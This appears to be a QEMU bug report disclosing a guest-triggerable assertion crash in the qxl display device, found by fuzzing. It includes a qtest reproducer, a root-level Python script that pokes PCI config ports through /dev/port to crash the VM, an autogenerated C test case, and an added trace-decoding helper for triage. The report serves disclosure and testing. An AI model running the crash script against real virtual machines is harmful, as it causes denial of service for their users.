path: root/results/classifier/gemma3:12b/device/1829
blob: c4ad59f2b364d76f04118bcea575307c24a44e38
DoS via assert failure by guest user
Description of problem:
A user with root privileges inside the guest VM can run a short script that crashes the whole VM with the error:

```plaintext
hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
```
Steps to reproduce:
1. The bug can be reproduced with the following qtest sequence:

   ```bash
   cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
   outl 0xcf8 0x8000101c
   outl 0xcfc 0xc000
   outl 0xcf8 0x80001001
   outl 0xcfc 0x01000000
   outl 0xc006 0x00
   EOF
   ```
2. Alternatively, run this Python 3 script as root inside the guest VM (start the VM with `qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults`):

   ```python
   import os
   f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
   l = os.lseek(f, 0xcf8, 0)
   os.write(f, b'\x80\x00\x10\x1c')
   l = os.lseek(f, 0xcfc, 0)
   os.write(f, b'\xc0\x00')
   l = os.lseek(f, 0xcf8, 0)
   os.write(f, b'\x80\x00\x10\x01')
   l = os.lseek(f, 0xcfc, 0)
   os.write(f, b'\x01\x00\x00\x00')
   l = os.lseek(f, 0xc006, 0)
   os.write(f, b'\x00')
   ```

   This script causes the VM to crash.

   [PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)
Additional information:
This issue was found by fuzzing. Here is the auto-generated C source code for a qtest test case that reproduces the bug.

```c
/*
 * Autogenerated Fuzzer Test Case
 *
 * Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#include "qemu/osdep.h"

#include "libqtest.h"

/*
 * cat << EOF | qemu-system-x86_64 -vga qxl -hda \
 * ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
 * outl 0xcf8 0x8000101c
 * outl 0xcfc 0xc000
 * outl 0xcf8 0x80001001
 * outl 0xcfc 0x01000000
 * outl 0xc006 0x00
 * EOF
 */
static void test_qxl_set_mode(void)
{
    QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");

    /* PCI config space: select register 0x1c (BAR3) of device 00:02.0, set its base */
    qtest_outl(s, 0xcf8, 0x8000101c);
    qtest_outl(s, 0xcfc, 0xc000);
    /* Select register 0x01 and write four bytes, which reach the Command register */
    qtest_outl(s, 0xcf8, 0x80001001);
    qtest_outl(s, 0xcfc, 0x01000000);
    /* I/O write into the device's port range at 0xc000; triggers the assertion */
    qtest_outl(s, 0xc006, 0x00);
    qtest_quit(s);
}

int main(int argc, char **argv)
{
    const char *arch = qtest_get_arch();

    g_test_init(&argc, &argv, NULL);

    if (strcmp(arch, "x86_64") == 0) {
        qtest_add_func("fuzz/test_qxl_set_mode", test_qxl_set_mode);
    }

    return g_test_run();
}
```
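An added triage helper (example code, not part of the report or of QEMU) that decodes a qtest out{b,w,l} trace such as the reproducer above into PCI configuration-space and device I/O events, so a maintainer can see which header fields and which BAR window a fuzzer case touches before opening the device model. The 0x100-byte window used to attribute a port write to a BAR is an assumption, since BAR sizes are not visible in the trace.

```python
import re
CONFIG_ADDRESS, CONFIG_DATA = 0xCF8, 0xCFC
WIDTH = {"outb": 1, "outw": 2, "outl": 4}
# Constructed sample input: the qtest reproducer from the report above.
SAMPLE_TRACE = """\
outl 0xcf8 0x8000101c
outl 0xcfc 0xc000
outl 0xcf8 0x80001001
outl 0xcfc 0x01000000
outl 0xc006 0x00
"""

def header_field(offset):
    """Name the PCI type-0 header field that holds a config-space byte offset."""
    if 0x10 <= offset < 0x28:
        return f"BAR{(offset - 0x10) // 4}"
    for limit, name in ((0x04, "Vendor/Device ID (read-only)"), (0x06, "Command"),
                        (0x08, "Status"), (0x10, "Class/Revision/Header")):
        if offset < limit:
            return name
    return f"offset {offset:#04x}"

def decode_trace(trace):
    """Turn qtest out{b,w,l} lines into PCI config-space and device I/O events."""
    events, config_reg, bars = [], None, {}
    for m in re.finditer(r"^\s*(outb|outw|outl)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)", trace, re.I | re.M):
        width, port, value = WIDTH[m.group(1).lower()], int(m.group(2), 16), int(m.group(3), 16)
        if port == CONFIG_ADDRESS:
            config_reg = value
            events.append({"kind": "config_address", "enable": bool(value >> 31),
                           "bus": (value >> 16) & 0xFF, "device": (value >> 11) & 0x1F,
                           "function": (value >> 8) & 0x07, "register": value & 0xFF})
        elif CONFIG_DATA <= port < CONFIG_DATA + 4:
            if not config_reg or not config_reg >> 31:
                events.append({"kind": "config_data_ignored", "port": port})
                continue
            # QEMU's pci_host ORs the data-port offset into the register field, low bits included.
            offset = (config_reg & 0xFF) | (port - CONFIG_DATA)
            fields = list(dict.fromkeys(header_field(o) for o in range(offset, offset + width)))
            if 0x10 <= offset < 0x28 and offset % 4 == 0 and width == 4:
                bars[(offset - 0x10) // 4] = value & ~0x3  # remember BAR base for later I/O
            events.append({"kind": "config_data", "offset": offset, "width": width,
                           "value": value, "fields": fields})
        else:
            # 0x100-byte window is an assumption: BAR sizes are not visible in the trace.
            hit = [(i, port - b) for i, b in bars.items() if 0 <= port - b < 0x100]
            events.append({"kind": "io", "port": port, "width": width, "value": value,
                           "bar": hit[0] if hit else None})
    return events
```

Running `decode_trace(SAMPLE_TRACE)` shows the reproducer as a BAR3 write, a 4-byte write starting at offset 1 that spills into the Command register, and an I/O write at offset 6 of the BAR3 window.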